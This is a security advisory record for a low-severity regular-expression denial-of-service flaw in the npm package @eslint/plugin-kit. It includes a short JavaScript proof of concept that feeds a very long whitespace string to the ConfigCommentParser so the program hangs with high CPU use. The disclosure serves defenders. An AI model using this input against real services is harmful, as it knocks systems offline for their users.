GHSA-7q7g-4xm8-89cq
Suggest an improvement- Source
- https://github.com/advisories/GHSA-7q7g-4xm8-89cq
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-7q7g-4xm8-89cq
- Aliases
- Related
- Published
- 2024-11-15T20:47:31Z
- Modified
- 2024-11-19T20:49:57Z
- Severity
-
- 3.5 (Low) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L CVSS Calculator
- Summary
- Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
- Details
-
Crafting a very large and well crafted string can increase the CPU usage and crash the program.
POC
const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage - References
Affected packages
npm / @eslint/plugin-kit
Package
- Name
- @eslint/plugin-kit
- View open source insights on deps.dev
- Purl
- pkg:npm/%40eslint/plugin-kit